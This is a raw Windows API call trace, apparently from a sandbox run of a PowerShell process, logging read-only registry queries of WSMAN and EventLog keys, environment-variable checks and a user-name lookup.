	[0403.355] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d25c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d258, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d25c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d258*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0403.355] CoTaskMemFree (pv=0x0) 
	[0403.356] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0403.356] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x41e820, lpcchValueName=0x26d308, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d308, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.356] CoTaskMemFree (pv=0x41e820) 
	[0403.356] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0403.356] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x41e820, lpcchValueName=0x26d308, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d308, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.356] CoTaskMemFree (pv=0x41e820) 
	[0403.356] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0403.356] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x41e820, lpcchValueName=0x26d308, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d308, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.356] CoTaskMemFree (pv=0x41e820) 
	[0403.357] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d2ec, lpData=0x0, lpcbData=0x26d2e8*=0x0 | out: lpType=0x26d2ec*=0x1, lpData=0x0, lpcbData=0x26d2e8*=0x8) returned 0x0
	[0403.357] CoTaskMemAlloc (cb=0xc) returned 0x4807e0
	[0403.357] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d2bc, lpData=0x4807e0, lpcbData=0x26d2b8*=0x8 | out: lpType=0x26d2bc*=0x1, lpData="2.0", lpcbData=0x26d2b8*=0x8) returned 0x0
	[0403.358] CoTaskMemFree (pv=0x4807e0) 
	[0403.815] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x320) returned 0x0
	[0403.815] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d1ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d1ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0403.815] CoTaskMemFree (pv=0x0) 
	[0403.816] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0403.816] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x41e820, lpcchValueName=0x26d258, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d258, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.816] CoTaskMemFree (pv=0x41e820) 
	[0403.816] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0403.816] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x41e820, lpcchValueName=0x26d258, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d258, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.816] CoTaskMemFree (pv=0x41e820) 
	[0403.816] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0403.816] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x41e820, lpcchValueName=0x26d258, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d258, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0403.816] CoTaskMemFree (pv=0x41e820) 
	[0403.816] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d23c, lpData=0x0, lpcbData=0x26d238*=0x0 | out: lpType=0x26d23c*=0x1, lpData=0x0, lpcbData=0x26d238*=0x8) returned 0x0
	[0403.816] CoTaskMemAlloc (cb=0xc) returned 0x480ac0
	[0403.816] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d20c, lpData=0x480ac0, lpcbData=0x26d208*=0x8 | out: lpType=0x26d20c*=0x1, lpData="2.0", lpcbData=0x26d208*=0x8) returned 0x0
	[0403.816] CoTaskMemFree (pv=0x480ac0) 
	[0403.818] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0403.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.818] CoTaskMemFree (pv=0x46a9e0) 
	[0403.823] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0403.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.823] CoTaskMemFree (pv=0x46a9e0) 
	[0404.267] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2d8 | out: phkResult=0x26d2d8*=0x304) returned 0x0
	[0404.271] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d24c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d248, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d24c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d248*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.271] CoTaskMemFree (pv=0x0) 
	[0404.272] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.272] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.272] CoTaskMemFree (pv=0x41e820) 
	[0404.272] CoTaskMemFree (pv=0x0) 
	[0404.272] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.272] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.272] CoTaskMemFree (pv=0x41e820) 
	[0404.272] CoTaskMemFree (pv=0x0) 
	[0404.272] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.272] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.272] CoTaskMemFree (pv=0x41e820) 
	[0404.272] CoTaskMemFree (pv=0x0) 
	[0404.272] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.272] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.273] CoTaskMemFree (pv=0x41e820) 
	[0404.273] CoTaskMemFree (pv=0x0) 
	[0404.273] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.273] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.273] CoTaskMemFree (pv=0x41e820) 
	[0404.273] CoTaskMemFree (pv=0x0) 
	[0404.273] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.273] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.273] CoTaskMemFree (pv=0x41e820) 
	[0404.273] CoTaskMemFree (pv=0x0) 
	[0404.273] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.273] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.273] CoTaskMemFree (pv=0x41e820) 
	[0404.273] CoTaskMemFree (pv=0x0) 
	[0404.273] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.273] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.273] CoTaskMemFree (pv=0x41e820) 
	[0404.273] CoTaskMemFree (pv=0x0) 
	[0404.273] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.273] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x41e820, lpcchName=0x26d2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.273] CoTaskMemFree (pv=0x41e820) 
	[0404.273] CoTaskMemFree (pv=0x0) 
	[0404.273] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x308) returned 0x0
	[0404.274] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x0) returned 0x2
	[0404.274] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x31c) returned 0x0
	[0404.274] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x0) returned 0x2
	[0404.274] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x324) returned 0x0
	[0404.274] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x0) returned 0x2
	[0404.274] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x328) returned 0x0
	[0404.274] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x0) returned 0x2
	[0404.274] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x32c) returned 0x0
	[0404.274] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x0) returned 0x2
	[0404.274] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x330) returned 0x0
	[0404.274] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x0) returned 0x2
	[0404.275] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x334) returned 0x0
	[0404.275] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x0) returned 0x2
	[0404.275] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x338) returned 0x0
	[0404.275] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x0) returned 0x2
	[0404.275] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x33c) returned 0x0
	[0404.275] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x340) returned 0x0
	[0404.275] RegCloseKey (hKey=0x340) returned 0x0
	[0404.275] RegCloseKey (hKey=0x304) returned 0x0
	[0404.276] RegCloseKey (hKey=0x33c) returned 0x0
	[0404.293] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0404.293] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d548) returned 0x1
	[0404.294] CoTaskMemFree (pv=0x1b97a6a0) 
	[0404.295] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0404.295] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d588) returned 1
	[0404.683] CoTaskMemFree (pv=0x41e820) 
	[0405.189] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x328) returned 0x0
	[0405.189] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d1fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d1fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.189] CoTaskMemFree (pv=0x0) 
	[0405.189] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.189] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x0, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.189] CoTaskMemFree (pv=0x41e820) 
	[0405.189] CoTaskMemFree (pv=0x0) 
	[0405.190] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.190] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x1, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.190] CoTaskMemFree (pv=0x41e820) 
	[0405.190] CoTaskMemFree (pv=0x0) 
	[0405.190] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.190] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x2, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.190] CoTaskMemFree (pv=0x41e820) 
	[0405.190] CoTaskMemFree (pv=0x0) 
	[0405.190] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.190] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x3, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.190] CoTaskMemFree (pv=0x41e820) 
	[0405.190] CoTaskMemFree (pv=0x0) 
	[0405.190] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.190] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x4, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.190] CoTaskMemFree (pv=0x41e820) 
	[0405.190] CoTaskMemFree (pv=0x0) 
	[0405.190] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.190] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x5, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.190] CoTaskMemFree (pv=0x41e820) 
	[0405.190] CoTaskMemFree (pv=0x0) 
	[0405.190] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.190] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x6, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.190] CoTaskMemFree (pv=0x41e820) 
	[0405.190] CoTaskMemFree (pv=0x0) 
	[0405.190] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.190] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x7, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.190] CoTaskMemFree (pv=0x41e820) 
	[0405.191] CoTaskMemFree (pv=0x0) 
	[0405.191] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.191] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x8, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.191] CoTaskMemFree (pv=0x41e820) 
	[0405.191] CoTaskMemFree (pv=0x0) 
	[0405.191] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x32c) returned 0x0
	[0405.191] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.191] RegOpenKeyExW (in: hKey=0x328, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x330) returned 0x0
	[0405.191] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.191] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x334) returned 0x0
	[0405.191] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.191] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x338) returned 0x0
	[0405.191] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.191] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x300) returned 0x0
	[0405.192] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.192] RegOpenKeyExW (in: hKey=0x328, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x320) returned 0x0
	[0405.192] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.192] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x308) returned 0x0
	[0405.192] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.192] RegOpenKeyExW (in: hKey=0x328, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x31c) returned 0x0
	[0405.192] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x0) returned 0x2
	[0405.192] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x324) returned 0x0
	[0405.192] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2e8 | out: phkResult=0x26d2e8*=0x344) returned 0x0
	[0405.192] RegCloseKey (hKey=0x344) returned 0x0
	[0405.193] RegCloseKey (hKey=0x328) returned 0x0
	[0405.193] RegCloseKey (hKey=0x324) returned 0x0
	[0405.194] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x324) returned 0x0
	[0405.194] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d1fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d1fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.194] CoTaskMemFree (pv=0x0) 
	[0405.194] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.194] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.194] CoTaskMemFree (pv=0x41e820) 
	[0405.194] CoTaskMemFree (pv=0x0) 
	[0405.194] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.194] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.194] CoTaskMemFree (pv=0x41e820) 
	[0405.194] CoTaskMemFree (pv=0x0) 
	[0405.194] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.194] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.194] CoTaskMemFree (pv=0x41e820) 
	[0405.194] CoTaskMemFree (pv=0x0) 
	[0405.194] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.194] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.194] CoTaskMemFree (pv=0x41e820) 
	[0405.195] CoTaskMemFree (pv=0x0) 
	[0405.195] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.195] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x41e820, lpcchName=0x26d288, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d288, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.195] CoTaskMemFree (pv=0x41e820) 
	[0405.195] CoTaskMemFree (pv=0x0) 
	[0405.195] CoTaskMemAlloc (cb=0x204) returned 0x41e820
